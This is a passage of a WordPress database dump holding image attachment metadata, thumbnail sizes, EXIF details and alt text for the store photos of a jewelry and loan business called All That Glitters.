gold-300x148.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"gold-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:16:\"gold-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:16:\"gold-300x157.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"gold-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:15:\"gold-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(277,147,'_edit_lock','1425145163:1'),(278,147,'_edit_last','1'),(279,147,'my_testi_caption','Jane'),(280,148,'_edit_lock','1425145246:1'),(281,148,'_edit_last','1'),(282,148,'my_testi_caption','Tarzan'),(283,151,'_wp_attached_file','2015/03/ATG_dark-bgrd.png'),(284,151,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:281;s:6:\"height\";i:161;s:4:\"file\";s:25:\"2015/03/ATG_dark-bgrd.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"ATG_dark-bgrd-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"ATG_dark-bgrd-90x90.png\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"ATG_dark-bgrd-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"ATG_dark-bgrd-200x150.png\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:24:\"ATG_dark-bgrd-100x30.png\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(285,151,'_wp_attachment_image_alt','All That Glitters'),(286,152,'_wp_attached_file','2015/03/ATG_light-bgrd.png'),(287,152,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:281;s:6:\"height\";i:161;s:4:\"file\";s:26:\"2015/03/ATG_light-bgrd.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"ATG_light-bgrd-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"ATG_light-bgrd-90x90.png\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"ATG_light-bgrd-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"ATG_light-bgrd-200x150.png\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:25:\"ATG_light-bgrd-100x30.png\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(288,152,'_wp_attachment_image_alt','All that Glitters, Jewelry and Loans'),(289,154,'_wp_attached_file','2015/02/Lombard-outside.jpg'),(290,154,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:459;s:4:\"file\";s:27:\"2015/02/Lombard-outside.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Lombard-outside-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"Lombard-outside-300x215.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"Lombard-outside-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:27:\"Lombard-outside-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"Lombard-outside-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:27:\"Lombard-outside-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:26:\"Lombard-outside-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:8;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1421671111;s:9:\"copyright\";s:13:\"© Jesse_Kody\";s:12:\"focal_length\";s:2:\"21\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:16:\"0.16666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(291,154,'_wp_attachment_image_alt','Lombard, All that Glitters'),(292,155,'_wp_attached_file','2015/02/Lombard-inside.jpg'),(293,155,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:459;s:4:\"file\";s:26:\"2015/02/Lombard-inside.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Lombard-inside-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Lombard-inside-300x215.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"Lombard-inside-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"Lombard-inside-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"Lombard-inside-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"Lombard-inside-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:25:\"Lombard-inside-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:8;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1421669958;s:9:\"copyright\";s:13:\"© Jesse_Kody\";s:12:\"focal_length\";s:2:\"17\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:3:\"0.6\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(294,155,'_wp_attachment_image_alt','Lombard, all that glitters'),(295,157,'_wp_attached_file','2015/02/Division-outside.jpg'),(296,157,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:472;s:4:\"file\";s:28:\"2015/02/Division-outside.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Division-outside-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Division-outside-300x221.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:221;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Division-outside-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:28:\"Division-outside-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"Division-outside-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:28:\"Division-outside-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:27:\"Division-outside-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:11;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1421420626;s:9:\"copyright\";s:13:\"© Jesse_Kody\";s:12:\"focal_length\";s:2:\"18\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(297,157,'_wp_attachment_image_alt','Division, all that glitters'),(298,158,'_wp_attached_file','2015/02/Division-inside.jpg'),(299,158,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:459;s:4:\"file\";s:27:\"2015/02/Division-inside.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Division-inside-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"Division-inside-300x215.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"Division-inside-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:27:\"Division-inside-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"Division-inside-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:27:\"Division-inside-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:26:\"Division-inside-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:8;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1421423571;s:9:\"copyright\";s:13:\"© Jesse_Kody\";s:12:\"focal_length\";s:2:\"16\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:3:\"0.5\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(300,158,'_wp_attachment_image_alt','Division inside, all that glitters'),(301,160,'_wp_attached_file','2015/02/Milwaukie-outside.jpg'),(302,160,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:459;s:4:\"file\";s:29:\"2015/02/Milwaukie-outside.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Milwaukie-outside-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Milwaukie-outside-300x215.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"Milwaukie-outside-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:29:\"Milwaukie-outside-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"Milwaukie-outside-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:29:\"Milwaukie-outside-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:28:\"Milwaukie-outside-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:11;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1421077323;s:9:\"copyright\";s:13:\"© Jesse_Kody\";s:12:\"focal_length\";s:2:\"30\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(303,160,'_wp_attachment_image_alt','Milwaukie, all that glitters'),(304,161,'_wp_attached_file','2015/02/Milwaukie-inside.jpg'),(305,161,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:426;s:4:\"file\";s:28:\"2015/02/Milwaukie-inside.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Milwaukie-inside-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Milwaukie-inside-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Milwaukie-inside-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:28:\"Milwaukie-inside-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"Milwaukie-inside-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:28:\"Milwaukie-inside-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:27:\"Milwaukie-inside-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:2.7999999999999998;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1421076224;s:9:\"copyright\";s:13:\"© Jesse_Kody\";s:12:\"focal_length\";s:2:\"16\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:4:\"0.05\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(306,162,'_wp_attached_file','2015/02/Milwaukie_outside1.jpg'),(307,162,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:459;s:4:\"file\";s:30:\"2015/02/Milwaukie_outside1.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Milwaukie_outside1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Milwaukie_outside1-300x215.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"Milwaukie_outside1-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:30:\"Milwaukie_outside1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"Milwaukie_outside1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:30:\"Milwaukie_outside1-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:29:\"Milwaukie_outside1-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:11;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1421077323;s:9:\"copyright\";s:13:\"© Jesse_Kody\";s:12:\"focal_length\";s:2:\"30\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(308,162,'_wp_attachment_image_alt','Milwaukie, all that glitters'),(309,163,'_wp_attached_file','2015/02/Milwaukie_inside1.jpg'),(310,163,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:459;s:4:\"file\";s:29:\"2015/02/Milwaukie_inside1.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Milwaukie_inside1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Milwaukie_inside1-300x215.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"Milwaukie_inside1-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:29:\"Milwaukie_inside1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"Milwaukie_inside1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:29:\"Milwaukie_inside1-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:28:\"Milwaukie_inside1-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:2.7999999999999998;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1421076224;s:9:\"copyright\";s:13:\"© Jesse_Kody\";s:12:\"focal_length\";s:2:\"16\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:4:\"0.05\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(311,163,'_wp_attachment_image_alt','Milwaukie, all that glitters'),(312,165,'_wp_attached_file','2015/02/Tigard-outside.jpg'),(313,165,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:459;s:4:\"file\";s:26:\"2015/02/Tigard-outside.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Tigard-outside-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Tigard-outside-300x215.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"Tigard-outside-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"Tigard-outside-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"Tigard-outside-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"Tigard-outside-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:25:\"Tigard-outside-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:8;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1421675367;s:9:\"copyright\";s:13:\"© Jesse_Kody\";s:12:\"focal_length\";s:2:\"29\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(314,165,'_wp_attachment_image_alt','Tigard, all that glitters'),(315,166,'_wp_attached_file','2015/02/Tigard-inside.jpg'),(316,166,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:459;s:4:\"file\";s:25:\"2015/02/Tigard-inside.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Tigard-inside-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Tigard-inside-300x215.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"Tigard-inside-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"Tigard-inside-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"Tigard-inside-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"Tigard-inside-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:24:\"Tigard-inside-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:8;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1421674018;s:9:\"copyright\";s:13:\"© Jesse_Kody\";s:12:\"focal_length\";s:2:\"16\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:3:\"0.8\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(317,166,'_wp_attachment_image_alt','Tigard, all that glitters'),(318,168,'_wp_attached_file','2015/02/Salem-inside.jpg'),(319,168,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:459;s:4:\"file\";s:24:\"2015/02/Salem-inside.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Salem-inside-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Salem-inside-300x215.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"Salem-inside-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"Salem-inside-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"Salem-inside-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"Salem-inside-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:23:\"Salem-inside-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:8;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 